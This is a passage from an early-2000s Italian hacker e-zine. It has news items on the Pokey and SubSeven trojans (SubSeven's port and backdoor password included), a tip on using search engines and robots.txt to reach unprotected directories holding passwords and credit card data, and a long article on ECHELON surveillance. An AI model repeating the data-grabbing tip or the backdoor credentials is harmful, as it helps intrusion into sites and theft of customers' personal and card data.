attivando una cancellazione dei file che si trovano nella directory di Windows al successivo riavvio del computer. Sfruttando MAPI, inoltre, il virus provvede ad autoinviarsi come allegato email a tutti gli indirizzi di posta elettronica contenuti nella rubrica Outlook del computer vittima.
Va detto che prima del reboot, il virus non provoca alcuna cancellazione. Qualora si fosse colpiti, dunque, è sempre possibile riscrivere l'autoexec.bat o sostituirlo con la copia di sicurezza. In questo modo si è sicuri che Pokey non potrà colpire. Dopo aver modificato l'autoexec.bat è bene andare a caccia del file "TROJ_ POKEY.A" e cancellarlo dal sistema.
Nota di Cookbooker: io l'ho sempre detto che i Pokemon sono pericolosi... ;o)



12/10/00
Atlanta (USA)
A quanto pare sono migliaia i server infetti da SubSeven DEFCON8 2.1. Questo trojan si è diffuso nei newsgruops con nomi apparentemente innoqui ed "interessanti", del tipo: SexPhoto.mpeg.exe.
Sembra che questo trojano sia nato per sfruttare attacchi del tipo DDoS ( Distrubuted Denial of Service). Questo trojano una volta ke la vittima si collega in Rete notifica l'avvenuta infezione in un canale di irc ed apre la porta 16959 della macchina (non quella dell'auto... :op) dando così accesso all'aggressore, che munito del nuovo Sub7 2.1 (il client...) si può collegare alla vittima usando kome password la parola "acidphreak".



**/07/00
Avete mai provato ad andare su un motore di ricerca ed inserire come file da cercare "user.dat" o "admin.dat"?
In alkuni motori di ricerca (come HotBot) oltre i file delle pass, si possono trovare anke dati come nr di carte di credito, dati anagrafici dei negozi ke girano in rete...
Molti negozi, memorizzano i dati in database o in file di testo, non tenendo conto ke se questi file non vengono registrati al di fuori della directory contenente il sito web, possono venire tranquillamente indicizzati da un motore di ricerca. Alcuni (i + furbi) usano un file kiamato robot.txt ke contiene la lista dei file e delle directory da non indicizzare, in questo caso dovete cercare il file robots.txt digitando www.nomesito.com/robots.txt, leggere il contenuto e digitare direttamente l'URL delle directory non indicizzate. Se siete fortunati e queste cartelle non sono state protette in lettura, il gioco è fatto, dato ke di solito qui vengono tenuti i dati ke ci interessano.



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#############################ECHELON############################<³¤|
|¤³>################################################################<³¤|


Echelon-Il grande orecchio


L' argomento non è molto complesso, però mi è sembrato giusto dividere l' articolo in varie parti per facilitarne la lettura.
Quello che leggerete sarà frutto di una rielaborazione di articoli apparsi sulla rete, anche se il cut&paste l' ho usato solo per alcune parti in cui non c' era davvero nulla da modificare.
Enjoy!
{Cujo}

Introduzione

Al giorno d' oggi, la privacy sembra essere uno dei valori fondamentali per l' esistenza di una persona.Si è addirittura arrivati ad istituire un garante che vigilasse sulle eventuali violazioni di questo diritto.Per questo la messa in onda di trasmissioni come "The big brother" o "Survival" scandalizzano l' opinione pubblica.In realtà la vita quotidiana non è molto diversa, basti pensare alle centinaia di telecamere di sicurezza che ci filmano nelle banche o nei negozi, ma i benpensanti e la società bigotta continuano ad ostentare la loro ottusità.Per quanto riguarda l' ambito delle comunicazioni le cose sono messe anche peggio.Dubito che molti di voi non sappiano cosa sia Echelon, dato che nelle settimane passate ha scatenato molteplici polemiche.Echelon non è nient' altro che quello che i paranoici temevano ( speravano? ) da molto tempo.E' vero, esiste un sistema di sicurezza che è capace di captare qualsiasi tipo di comunicazione, sia essa telefonica o telematica ( e-mai e fax in cima alla lista ).



The story so far.....

La " nostra cara " NSA lavora da anni a questo progetto, e la sua esistenza non è assolutamente oscura alle alte cariche Stato.Pensate solo che la " Lady di Ferro" Margaret Thatcher utilizzava questa enorme rete di ricezione per spiare i suoi collaboratori.Durante la campagna elettorale dell' 83, infatti, si rivolse all' Intelligence service e il famoso " Mister M " ( no, non è una leggenda di 007, esiste davvero! =) ) si rivolse ai partner canadesi del Cse che insieme ad australiani e neozelandesi si stabilirono in un locale superprotetto a Londra dove installarono la loro base operativa.

Solamente in questi ultimi tempi, però, cominciano a venire a galla le prime dichiarazioni da parte dei diretti interessati.

L'Electronic Privacy Information Center (EPIC) [un centro di ricerca nato a Washington nel 1994 per sensibilizzare l'attenzione sulle libertà civili e la tutela della privacy, che si appoggia al FOIA. n.d. Me ;-) ] ha chiesto il 3 dicembre scorso ad un tribunale federale di disporre la diffusione di documenti controversi relativi a possibili attività di sorveglianza condotte su cittadini americani. La causa promossa dall'EPIC intende giungere alla pubblicazione di documenti riservati della NSA (National Security Agency) nei quali si analizzano i presupposti giuridici delle attività di sorveglianza effettuate dal servizio di sicurezza americano.
La NSA aveva rifiutato, all'inizio dell'anno, di fornire questa documentazione alla Commissione parlamentare sui servizi segreti, e ciò aveva portato ad una censura pubblica (fatto insolito) dell'agenzia di spionaggio. Il deputato Porter J. Goss, presidente del collegio di controllo, scrisse in una relazione della Commissione pubblicata a maggio che la motivazione con cui la NSA aveva giustificato il rifiuto di fornire le osservazioni giuridiche in oggetto era "poco convincente e opinabile". Rilevava che se i legali della NSA "interpretano in modo eccessivamente permissivo i poteri della NSA, potrebbero nascerne pericoli per il diritto alla privacy dei cittadini USA". A breve distanza dalla pubblicazione della relazione della Commissione, EPIC ha presentato alla NSA una richiesta di esibizione della documentazione in oggetto ai sensi della Legge sulla libertà di informazione (FOIA). Nonostante il FOIA fissi un limite di 20 giorni lavorativi per la risposta, la NSA non ha ottemperato alla richiesta dell'EPIC.
Il direttore dell'EPIC, Marc Rotenberg, ha dichiarato che "lo statuto della NSA non consente la raccolta di informazioni su privati cittadini. Tuttavia, abbiamo ragione di credere che la NSA stia acquisendo e intercettando in modo indiscriminato comunicazioni private condotte via Internet".
Da qualche tempo le attività di sorveglianza della NSA sono seguite con maggiore attenzione, e secondo alcuni studi la NSA sta coordinando una grossa iniziativa di intercettazione a livello mondiale denominata ECHELON. Nell'ultimo numero del The New Yorker Magazine, si afferma che alla NSA sono bastati 11 mesi di registrazioni del traffico su Internet per esaurire una capacità di memoria progettata per durare tre anni.
Il fondamento giuridico delle attività di intercettazione della NSA costituisce un tema chiave che EPIC intende esaminare in un ampio studio che verrà pubblicato all'inizio del prossimo anno.
Lo studio sarà condotto da Duncan Campbell, giornalista e produttore televisivo scozzese. All'inizio di quest'anno, Campbell è stato nominato consulente del Parlamento europeo ed ha preparato un'analisi su ECHELON e l'attività di sorveglianza delle comunicazioni, in cui erano contenute le prime prove documentarie del sistema di sorveglianza globale. Nei prossimi mesi Campbell collaborerà con EPIC all'elaborazione di un rapporto che sarà presentato durante le audizioni che si prevede terrà il Congresso in materia di servizi segreti, quarto emendamento e diritti dell'uomo.
The story so far...#2
Nessuno ne parla. I documenti sono stati cancellati dalla banca dati. Ma Bruxelles sta studiando un protocollo per le intercettazioni. Le uniche tracce le ha trovate una rivista telematica tedesca. E subito è scoppiata la polemica.
La denuncia di Barr è fondata. Nelle scorse settimane, dopo una coraggiosa campagna stampa del quotidiano Ekstra Bladet, la Danimarca è stato il primo paese europeo ad ammettere il coinvolgimento fin dal 1950 nel progetto Echelon, seppure come "parte terza": scambia cioè le informazioni solo dopo l'assenso americano e successivamente quello degli altri quattro alleati. E l'Italia? Il comitato di controllo sui servizi segreti sta ancora indagando, così come sta cercando di scoprire qualcosa la procura di Roma. Nel rapporto di Campbell al Parlamento europeo c'è però già una prima importante indicazione: la base Usa di San Vito dei Normanni, in Puglia, viene utilizzata dal '64 per le intercettazioni radio ad alta frequenza assieme a quella di Chicksands, in Inghilterra, e Karamursel, in

  
Turchia. "Non c'è dubbio che Echelon opera in violazione delle leggi europee sulla privacy" sostiene David Soble, direttore dell'Electronic privacy information center. "Questa è la preoccupazione principale. Poi, naturalmente, c'è lo spionaggio economico".
La guerra fredda aveva fatto crescere a dismisura la Nsa e le agenzie collegate. Il crollo del Muro di Berlino le ha gettate nel panico, senza più una missione per giustificarne l'esistenza e il ricco budget. "Prima l'amministrazione di George Bush e poi quella di Bill Clinton sono corse in aiuto riuscendo a trovare il nuovo nemico: non più i comunisti, ma i capitalisti competitori" dichiara a Panorama Patrick Poole, il maggiore esperto di sorveglianza elettronica. "Per i due presidenti si è trattato solo della naturale estensione del concetto che ciò che è buono per l'industria americana è buono anche per gli Usa.
I casi citati nei rapporti presentati al Parlamento europeo sono numerosi. Si parte dal 1993, con la testimonianza di Howard Teicher, un ex funzionario del National security council americano, il quale ha rivelato che la stazione di Menwith Hill aveva messo nel mirino il consorzio europeo Panavia per le vendite dei Tornado in Medio Oriente. Un anno dopo, la Nsa intercettò alcune telefonate fra i manager della società francese Thomson-Csf e le autorità governative brasiliane per la vendita di un sistema radar Sivam, del valore di 1,3 miliardi di dollari, destinato all'Amazzonia. Nelle telefonate si accennava alle tangenti da pagare ad alcuni ministri. L'amministrazione Clinton informò la Raytheon corporation, una delle aziende legate al progetto Echelon, che fu in grado di fare un'offerta migliore e di vincere il ricco contratto.
Nel 1995 da un satellite commerciale di comunicazioni la stazione di ascolto inglese riuscì a intercettare i fax e le telefonate fra il quartier generale del consorzio europeo Airbus, la compagnia di bandiera saudita e alcuni principi della monarchia guidata da re Fahd. I contatti riguardavano l'acquisto degli aerei europei. L'informazione fu subito trasmessa a Boeing e McDonnell Douglas, che, nemmeno a dirlo, alla fine hanno trionfato: nel 1998 si sono aggiudicate l'affare con un contratto di 6 miliardi di dollari.
Nel documento di Campbell ci sono nomi, date, luoghi, tecniche del Grande orecchio: la costante intercettazione dei diplomatici italiani e francesi dalle centrali di Chicksands e Cheltenhem, in Gran Bretagna, lo spionaggio sulle ricerche che riguardavano gli standard di emissione delle auto giapponesi, il monitoraggio sui negoziati per le importazioni di vetture di lusso dal Giappone e su quelli per il Gatt attraverso il controllo delle telefonate tra il presidente francese François Mitterrand e quello della commissione europea, Jacques Delors.
Nemmeno il ricorso alla decrittazione evita di essere spiati. Nei documenti presentati alla Commissione Ue si spiega come alcune società, fra cui Microsoft, Lotus e Netscape, hanno permesso al governo Usa di indebolire la codificazione dei propri software. Non solo: uno degli obiettivi più importanti della Nsa è stata un'azienda svizzera, la Crypto Ag, che fornisce i codici diplomatici e militari a più di 130 paesi. Gli 007 americani sono riusciti a infiltrare l'azienda direttamente attraverso il proprietario-fondatore, Boris Hagelin.
E Internet? Anche la rete, simbolo di democrazia, è intrappolata: gli americani hanno bloccato nove centrali strategiche di smistamento di Internet con software in grado di controllare il traffico. Le stesse linee telefoniche sottomarine vengono costantemente monitorate, soprattutto quelle fra Europa e Africa sotto il Mediterraneo. ( 'azz!)
Non c'è niente che si possa fare contro le intrusioni della Nsa oltre il bombardamento di e-mail organizzato lo scorso 21 ottobre nel cosiddetto Echelon day? Per il momento la sfida più concreta sembra venire dalla Francia, dove uno studio legale ha annunciato un'azione penale e civile contro il governo Usa e quello britannico in rappresentanza di gruppi che si occupano dei diritti civili e di aziende che hanno denunciato di aver perso una serie di contratti a causa del "
furto di informazioni".
Articolo di Gian Antonio Righi-Tratto da Panorama OnLine



Lo scandalo in USA
Dopo il rapporto presentato al parlamento europeo una settimana fa, arrivano le prime, clamorose conferme e rivelazioni su Echelon e sugli abusi commessi utilizzando il network satellitare. Sono ex spie canadesi e americane a parlare per la prima volta. Mike Frost, che ha lavorato per l'intelligence canadese dal 1972 al 1992, ha raccontato alla televisione americana Cbs come la Thatcher si sia servita, a scopi di politica interna, di Echelon. "
Non pensate che sia fantascienza. Qualsiasi cosa, dal trasferimento dei dati alle telefonate via cellulare fino ai bancomat e alle radio portatili che controllano le culle dei neonati, tutto viene captato dalle antenne e dai satelliti di Echelon" ha rivelato Frost. ( ragazzi, qui stiamo messi proprio male...)
Che il Grande Orecchio sia un pericolo per la democrazia e per la privacy dei cittadini lo ha confermato un'altra ex spia, Margaret Newsham, che ha vissuto per anni nella base top secret inglese di Menwith Hill, la più importante, gestita direttamente dalla Nsa americana. "
Quando arrivai lì ero convinta che avrei ascoltato conversazioni in russo, cinese o vietnamita. No, non era proprio così. Un giorno un mio collega mi disse: "Margaret vieni qui, ti faccio ascoltare qualcosa di veramente interessante". Presi la cuffia e mi rivolsi al mio amico: "Ma questi sono due americani". "Certo" mi fa lui. "Chi è quello che parla come un capo?". "Non lo conosci? È il senatore Strom Thurmond, sta telefonando dal suo ufficio al Congresso". Ecco cosa è capace di fare la Nsa: spiare anche i politici".
Già un anno fa, la National security agency, l'agenzia più segreta dell'apparato spionistico americano, quella che ha più fondi e più uomini della stessa Cia, fu costretta ad ammettere di conservare nei suoi archivi ben mille pagine di informazioni su Lady Diana. Perché?
Una terza spia, un ex funzionario della Nsa, Wayne Madsen, ha raccontato nei giorni scorsi che "
la principessa Diana, nella sua campagna contro le mine, entrò in conflitto con la politica americana. Ecco perché la sua attivita' era di interesse primario per gli Stati Uniti. Ed ecco perché la Nsa la intercettava 24 ore al giorno".
Non solo: quando gli spioni americani ritenevano che superasse i limiti, facevano arrivare alcuni brani delle conversazioni private di Diana ai tabloid inglesi. "
Vi sembra strano? Vi sembra un film? Questo non è un romanzo di spionaggio. Questa è la realtà. Questo è il modo in cui Echelon funziona" conclude l'ex agente Frost. "Io lo so perché sono stato là, sono stato addestrato, ho lavorato per questo progetto che minaccia tutti: dai due ministri inglesi fino all'ultimo cittadino".



E qui da noi?
Lo STOA (Scientific and Technological Options Assessment ) e' un' unita' del Direttorato Generale della Ricerca, con sede a Strasburgo, che ha lo scopo istituzionale di fornire un supporto conoscitivo e orientativo a carattere tecnico-scientifico ai lavori del Parlamento Europeo. Le problematiche trattate da questa task-force di esperti vanno dalla medicina all'agricoltura, dall'urbanistica alle tecnologie di informazione e comunicazione, ecc...

Il rapporto intitolato "
Valutazione delle tecnologie di controllo politico" afferma perentoriamente che "In Europa tutte le telefonate, i fax e i test di posta elettronica sono regolarmente intercettati, e dal centro strategico inglese di Menwith Hill le informazioni di interesse vengono trasferite al quartier generale della National Security Agency, l'agenzia di spionaggio elettronico americana".
Il network globale di spionaggio civile (ed è questa la grande novità !), fortunatamente, ha anche un nome suggestivo e per i giornali di tutto il mondo è un invito a nozze: in Italia "
il Mondo" è il primo a sparare la notizia in prima pagina e a dare il via ad un domino inarrestabile di reazioni che non risparmierà neanche la magistratura, il nostro Parlamento e l'Ufficio del Garante per la privacy. Tutti si interrogano sulla liceità dell'operazione e sul ruolo che una tale struttura a potuto avere nella copertura dei "misteri italiani" da Ustica al caso Moro. Ma nessuno si domanda quali siano le fonti del rapporto.
Solo Libération punta il dito sulla credibilità del rapporto, affermando che è costruito soltanto su fonti indirette e giornalistiche: Somebody's listening (inchiesta del 1981 del giornalista inglese Duncan Campbell), Secret Power (libro cult del 1996 del neozelandese Nicky Hager), The Puzzle Palace ( libro del 1982 del giornalista americano James Bamford che descrive il pre-Echelon), l'agenzia Reuters, il Telegraph, il Times, il Guardian e poi le denunce di Amnesty International, della rivista di contro informazione Covert Action Quarterly, di Privacy International e di Statewatch, organizzazione inglese di monitoraggio sulle libertà politiche.


Cronologia degli avvenimenti
_____ ____________________________________________________
|Anno | Avvenimenti |
|1943 | si forma l'allanza BRUSA, BRitain - USA |
|1947 | si forma l'alleanza UKUSA, United Kingdom - USA |
|1957 | Affare Crypto AG |
|1988 | La prima volta in cui viene mensionato ECHELON. |
|1996 | backdoor nel software Lotus Notes |
|1998 | Il Parlamento europo riceve il rapporto su Echelon |
|1999 | Nuovo rapporto su ECHELON |
----- ----------------------------------------------------

Sembrerebbe ( da quanto riferito da "
La Repubblica" ) che Il rapporto Stoa sia stato voluto e commissionato alla Omega Foundation da Glyn Ford, deputato laburista del Parlamento europeo e direttore di Stoa. Il suo lavoro di lobby ,tra gennaio e settembre 1998, quando il Parlamento europeo vota una risoluzione, è intenso. Soprattutto in Inghilterra, tra verdi, laburisti, organizzazioni non governative, gruppi e associazioni della galassia dell'anti militarismo e delle battaglie per la privacy. La lobby di Ford non ottiene però buoni risultati sul piano politico, solo il titolo e un brevissimo accenno a Echelon nella Risoluzione che il Parlamento europeo vota nel settembre 1998. La "Risoluzione sulle relazioni transatlantiche e il sistema Echelon" riguarda una serie di problemi commerciali tra Ue e Usa e solo al punto 14, il penultimo, recita: "La crescente importanza di Internet e delle telecomunicazioni mondiali in genere, e del sistema Echelon in particolare, richiedono misure precauzionali per quanto concerne le informazioni economiche".
Solo un europarlamentare belga avanza un'ipotesi, e suggerisce che il sistema di intercettazioni Echelon sia coperto da accordi bilaterali segreti tra i vari paesi della Ue e gli Stati Uniti.
E qui da noi? #2
< areeechelon.gif>
Nella cartina, la struttura dei centri d'ascolto noti di Echelon e le cinque aree territoriali che controllano attraverso un sistema di satelliti

Ci si arriva da Manchester o da Edimburgo lungo le stradine dello Yorkshire. All'improvviso spuntano enormi globi bianchi. Se ne vedono 25 e ciascuno nasconde un'antenna puntata verso un satellite. Sembra una base lunare. Poi si nota un po' di vita, qualche guardia davanti ai recinti, alcune auto che entrano ed escono. Poco più in là si intravedono diversi edifici stile caserma. Dentro ci lavorano 1.500 statunitensi e un migliaio di britannici, che, 24 ore al giorno, maneggiano i computer più avanzati e gli strumenti di ascolto più sofisticati del mondo. Benvenuti a Menwith Hill, sperduta landa del nord dell'Inghilterra, uno dei posti più segreti del pianeta. E anche dei più controversi.
È qui che da oltre 50 anni opera Echelon. Sebbene ufficialmente di proprietà della Raf, la stazione è gestita dalla National security agency, la più imponente centrale americana di spionaggio, incaricata della sorveglianza elettronica, con un budget di 4 miliardi di dollari l'anno (uno più della Cia) e 40 mila agenti. Echelon è un progetto così segreto che, fino a qualche settimana fa, nessuna autorità politica ne aveva neppure ammesso l'esistenza. Ora una serie di rapporti declassificati confermano non solo che le intercettazioni elettroniche globali vanno avanti dagli anni della guerra fredda, ma che Echelon è stato potenziato negli ultimi dieci anni con stazioni di ascolto sparse in tutti i continenti, capaci di catturare e analizzare ogni telefonata, fax, telex, e-mail, spedito via satellite o via Internet in un posto qualsiasi del mondo. Attraverso un software chiamato N-gram, le cyber-spie possono scandagliare l'imponente traffico usando parole chiave o combinazioni di parole come Clinton, droga, bomba, terrorismo, contratto, Wall Street e via dicendo.
Ancora più allarmanti sono i rapporti di due esperti, il giornalista inglese Duncan Campbell e Nikos Bogonikolos della società Zeus, che da martedì 22 febbraio vengono esaminati e discussi dalla commissione Libertà civili e affari interni del Parlamento europeo. Nei due documenti, destinati a riattizzare il fuoco di polemiche dell'Ue contro gli Stati Uniti, ma anche contro la Gran Bretagna, che si trova nella posizione singolarissima di essere contemporaneamente membro dell'Ue ma anche del progetto anglosassone, la conclusione è che Echelon è attualmente utilizzato soprattutto per lo spionaggio economico, per avvantaggiare cioè le imprese americane a danno di quelle europee e asiatiche.
Più in generale, è abusato dalle agenzie spionistiche dei cinque paesi di lingua inglese per controllare singoli individui, in palese violazione delle rispettive costituzioni e leggi. Ecco perché dopo il Parlamento europeo, presto anche il Congresso americano aprirà un'inchiesta sulla Nsa. "
Sono stupito" dice il deputato repubblicano della Georgia, Bob Barr, paladino della guerra a Echelon "che i paesi che operano assieme alla Nsa non abbiano finora chiesto di essere informati. E sono ancor più stupito perché, secondo le mie informazioni, vi partecipano tutti i paesi europei".
Articolo di Laura Ronchi


Links
Tactical Media Crew Paul Wolf (attivista delle libertà civili)
Control.alt del Tactical Media Crew
Echelon, un lavoro sporco su Disinformation
Stati Uniti, National Security Agency
Gran Bretagna, Government Communications Head Quarters
Canada, Communications Security Establishment
Australia, Defense Signals Directorate
Base americana di Menwith Hill
13th Usasa Field Station sito ufficiale dell'associazione di Menwith Hill
Base di Pine Gap in Australia.
Base di Yakima nello stato di Washington


Spero vi sia piaciuto questo articolo, anche se ci sia ancora poca carne al fuoco.Spero di poter scrivere un altro articolo sull' argomento appena se ne saprà di più.

E ricordate, non siamo mai soli!!! (N.D. Cook: neanke al cesso!)
ByeZ
{Cujo}




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#############################LINKS##############################<³¤|
|¤³>################################################################<³¤|

---------------------------------------------------------------------
Nome sito Indirizzo Argomento
---------------------------------------------------------------------
Underground Magazine Crew->http://umcrew.tsx.org |E-zine
Spippolatori-------------->http://www.spippolatori.com |E-zine
Wannabe ------------------>http://www.attilahack.cjb.net |E-zine
Anarchy in the System----->http://aisprod.cjb.net |E-zine
2600---------------------->http://www.2600.com |E-zine
SpaghettiPhreakers-------->http://come.to/spaghettiphreakers |PHREAK
Astalavista--------------->http://astalavista.box.sk |Crack Searcher
Quequero ----------------->http://quequero.cjb.net |CRACKing
SoftProject -------------->http://www.softpj.org |HACK
ValVoline Crew ----------->http://www.kyuzz.org/valvoline |HACK
Lord Guf------------------>http://guf.cjb.net |HACK
Cookbooker hacker site---->http://www.cookbooker.com |HACK
ulisses1------------------>http://ulisses1.tsx.org |HACK
Bismark------------------->http://www.biskamrk.it |Underground
Legacy of Kings----------->http://legacyofkings.tsx.org |AntiLamah
TLsecurity---------------->http://www.tlsecurity.net |"
Security"
TuttoScript--------------->http://www.tuttoscript.net |IRC
MondoScript--------------->http://www.mondoscript.net |IRC
Raven--------------------->http://digilander.iol.it/mpetro |Anarchy



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<##########################KONKLUSIONE###########################<³¤|
|¤³>################################################################<³¤|

Raga, questo primo numero è finito, vi assikuro ke il prossimo numero sarà ankora migliore di questo (ma sarà possibile? ;o). Vi rikordiamo ke la nostra crew è in espansione e stiamo solo aspettando una vostra e-mail per akkoglievi "
nella famiglia" (eheheh). Spero ke questo numero vi sia piaciuto... se non è kosì... aspettate il prossimo! Alla prox!
P.S. spero che gli ASCII vi siano piaciuti me li sono dovuti fare io :op l'ultimo giorno: il nostro ASCII artist all'ultimo momento è mankato... alla konsegna degli artikoli! ;o)
ByeZ, Cookbooker


I membri dell'UMD3RGR0UND M4GAZ|N€ Crew:

æ-------------------------æ
#########|_ UMC _|#########
æ-------------------------æ

Ruolo Nickname e-mail
-----------------------------------------------
Redattore: Cookbooker Cookbooker@libero.it

Collaboratori: >Buddamonk monk84@libero.it
>Rhost rhost@post.com
>Cujo ????????????????
>EvilAngel ????????????????
>Ulisses1 ????????????????
>GoNe PoSt@L ????????????????
>Freesto huhii@tin.it
>Raven The_Raven@libero.it
>Fabripal ????????????????
----------------------------------------------

æ-------------------------æ
## http://umcrew.tsx.org ##
æ-------------------------æ



³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
******* * * ***** ***** * * ** ooo
* * * * * ** * * * o o
* ***** **** **** * * * * * o
* * * * * * ** * * o
* * * ***** ***** * * ** o o o o
¤
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³




























æ------------------------æ
Don't Cross
æ------------------------æ
































l'e-zine è finita... :)

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT